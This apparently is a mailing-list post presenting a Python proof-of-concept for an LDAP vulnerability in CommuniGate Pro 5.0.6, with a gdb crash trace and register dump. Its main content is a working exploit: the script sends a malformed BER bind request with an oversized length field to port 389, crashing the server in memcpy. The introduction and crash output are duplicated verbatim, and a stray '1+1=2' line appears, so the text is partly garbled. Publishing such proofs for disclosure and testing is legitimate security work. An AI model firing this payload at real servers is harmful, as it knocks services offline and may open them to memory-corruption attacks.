The simple code below can be used to reproduce one of CommuniGate 5.0.6 LDAP vulnerabilities
(http://www.gleg.net/cg_advisory.txt)
#!/usr/bin/env python
# Use this code at your own risk.
# It may crash your server!
# Author: Evgeny Legerov
import sys
import socket
HELP="""
CommuniGate Pro 5.0.6 vulnerability.
Found with ProtoVer LDAP testsuite v1.1
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1389495376 (LWP 20235)]
0xada99bbc in memcpy () from /lib/libc.so.6
(gdb) backtrace
#0 0xada99bbc in memcpy () from /lib/libc.so.6
#1 0x083924b8 in STCopyCString ()
#2 0x08349d5b in BERPackedData::makeCString ()
#3 0x081ae71a in VLDAPInput::processBINDrequest ()
#4 0x081af747 in VLDAPInput::processInput ()
#5 0x082c9373 in VStream::worker ()
#6 0x082ca1e9 in VStream::starter ()
#7 0x08399e7d in STThreadStarter ()
#8 0xadb8bb80 in start_thread () from /lib/libpthread.so.0
#9 0xadaf8dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0xada99bbc <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)
(gdb) info regi esi edi ecx
esi 0x8688961 141068641
edi 0x86c6fff 141324287
ecx 0x3fff7eae 1073708718
"""
The simple code below can be used to reproduce one of CommuniGate 5.0.6 LDAP vulnerabilities
(http://www.gleg.net/cg_advisory.txt)
#!/usr/bin/env python
# Use this code at your own risk.
# It may crash your server!
# Author: Evgeny Legerov
import sys
import socket
HELP="""
CommuniGate Pro 5.0.6 vulnerability.
Found with ProtoVer LDAP testsuite v1.1
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1389495376 (LWP 20235)]
0xada99bbc in memcpy () from /lib/libc.so.6
(gdb) backtrace
#0 0xada99bbc in memcpy () from /lib/libc.so.6
#1 0x083924b8 in STCopyCString ()
#2 0x08349d5b in BERPackedData::makeCString ()
#3 0x081ae71a in VLDAPInput::processBINDrequest ()
#4 0x081af747 in VLDAPInput::processInput ()
#5 0x082c9373 in VStream::worker ()
#6 0x082ca1e9 in VStream::starter ()
#7 0x08399e7d in STThreadStarter ()
#8 0xadb8bb80 in start_thread () from /lib/libpthread.so.0
#9 0xadaf8dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0xada99bbc <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)
(gdb) info regi esi edi ecx
esi 0x8688961 141068641
edi 0x86c6fff 141324287
ecx 0x3fff7eae 1073708718
"""
print HELP
host="localhost"
port=389
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
s = "\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"
s += "\x84\xff\xff\xff\xff"
sock.sendall(s)
sock.close()
1+1=2
Best regards,
Evgeny Legerov
[ reply ]